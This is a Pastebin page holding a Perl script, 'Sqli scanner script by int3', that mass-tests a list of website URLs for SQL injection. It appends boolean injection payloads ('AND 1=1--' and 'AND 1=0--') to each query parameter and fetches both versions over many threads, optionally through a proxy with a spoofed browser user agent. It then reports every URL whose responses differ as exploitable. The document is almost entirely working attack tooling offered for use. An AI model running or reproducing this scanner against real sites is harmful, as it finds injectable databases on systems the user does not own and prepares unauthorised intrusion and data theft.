Advertisement
Guest User

[Perl] Sqli scanner script by int3

a guest
Nov 9th, 2010
2,332
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #sqli scanner script by int3
  2. #open file, test all sites for sql injection
  3. #usage: perl sqlscan.pl filename [-e ender] [-p proxy] [-t threads]
  4. #support http proxy like -p localhost:8080
  5. #-e optional, default end with --
  6. #-p optional, default no proxy
  7. #-t optional, default 10 threads
  8. #filename is list of files
  9. #default no proxy and 10 threads
  10.  
  11. use LWP::UserAgent;
  12. use Getopt::Std;
  13. use Thread;
  14. use threads::shared;
  15.  
  16. $maxthreads = 10; #max threads at a time
  17. $filename = '';
  18. $status = 0;
  19. $proxy = '';
  20. $ender = '--';
  21. for ($i = 0; $i < ($#ARGV+1); $i++) {
  22.     $s = @ARGV[$i];
  23.     if ($status eq 1) {
  24.         $proxy = 'http://' . $s . '/'; #proxy speicifed
  25.         $status = 0;
  26.     }
  27.     elsif ($status eq 2) {
  28.         $maxthreads = $s; #threads specified
  29.         $status = 0;
  30.     }
  31.     elsif ($status eq 3) {
  32.         $ender = $s; #different ender
  33.         $status = 0;
  34.     }
  35.     elsif ($s eq '-p') {
  36.         $status = 1;
  37.     }
  38.     elsif ($s eq '-t') {
  39.         $status = 2;
  40.     }
  41.     elsif ($s eq '-e') {
  42.         $status = 3;
  43.     }
  44.     elsif ($s eq '-h') {
  45.         print "perl sqlscan.pl filename [-e ender] [-p proxy] [-t threads]\n";
  46.     }
  47.     elsif (substr($s, 0, 1) eq '-') {
  48.         print "Invalid switch, use -h for help\n";
  49.     }
  50.     else {
  51.         $filename = $s;
  52.     }
  53. }
  54. open(list, $filename);
  55. @sites;
  56. while (($line = <list>) ne undef) {
  57.     chomp($line);
  58.     push(@sites, $line);
  59. }
  60. @match1;
  61. @match2;
  62. for ($i = 0; $i <= $#sites; $i++) {
  63.     $_ = @sites[$i];
  64.     /([^\?]*)\?([^\?]*)/; #match for url base
  65.     $base = $1; #base of url
  66.     $dyn = $2; #dynamic part
  67.     $end = 0;
  68.     $lastpos = 0;
  69.     while ($end ne 1) {
  70.         $lastpos = index($dyn, '&', $lastpos+1);
  71.         if ($lastpos eq -1) {
  72.             $lastpos = length($dyn);
  73.             $end = 1;
  74.         }
  75.         $t = $dyn;
  76.         substr($t, $lastpos, 0) = '%20AND%201=1' . $ender;
  77.         push(@match1, $base . '?' . $t);
  78.         $t = $dyn;
  79.         substr($t, $lastpos, 0) = '%20AND%201=0' . $ender;
  80.         push(@match2, $base . '?' . $t);
  81.     }
  82. }
  83. my @exploit : shared; #0 if not exploit, 1 if exploit
  84. my $threads : shared = 0; #number of threads running
  85. for ($i = 0; $i <= $#match1; $i++) {
  86.     while (1) {
  87.         if ($threads < $maxthreads) {
  88.             my $thr = threads->create(\&check_site, $i, @match1[$i], @match2[$i]); #compare and check if possible sql exploit
  89.             $thr->detach(); #detach from thread
  90.             last; #next loop
  91.         }
  92.         else {
  93.             sleep(1);
  94.         }
  95.     }
  96. }
  97. while ($threads > 0) {
  98.     sleep(1); #wait until all threads terminate
  99. }
  100. for ($i = 0; $i <= $#exploit; $i++) {
  101.     if (@exploit[$i] eq 1) {
  102.         print @match2[$i] . "\n";
  103.     }
  104. }
  105. exit(0);
  106.  
  107. #check if site exploitable by: connect to sites, strip html, and compare (exploit if different)
  108. sub check_site {
  109.     $page1, $page2;
  110.     $threads++; #new thread create
  111.     $ua = LWP::UserAgent->new;
  112.     $ua->timeout(10);
  113.     if ($proxy ne '') {
  114.         $ua->proxy('http', $proxy);
  115.     }
  116.     $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
  117.     $response = $ua->get($_[1]); #get contents when sql result true
  118.     if ($response->is_success) {
  119.         $page1 = $response->content;
  120.     }
  121.     $ua = LWP::UserAgent->new;
  122.     $ua->timeout(10);
  123.     if ($proxy ne '') {
  124.         $ua->proxy('http', $proxy);
  125.     }
  126.     $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");
  127.     $response = $ua->get($_[2]); #get contents when sql result false
  128.     if ($response->is_success) {
  129.         $page2 = $response->content;
  130.     }
  131.     $page1 =~ s/<.+?>//g; #strip html
  132.     $page2 =~ s/<.+?>//g;
  133.     if ($page1 eq $page2) {
  134.         @exploit[$_[0]] = 0; #not exploit
  135.     }
  136.     else {
  137.         @exploit[$_[0]] = 1; #exploit
  138.     }
  139.     $threads--; #thread close
  140. }
Advertisement
RAW Paste Data Copied
Advertisement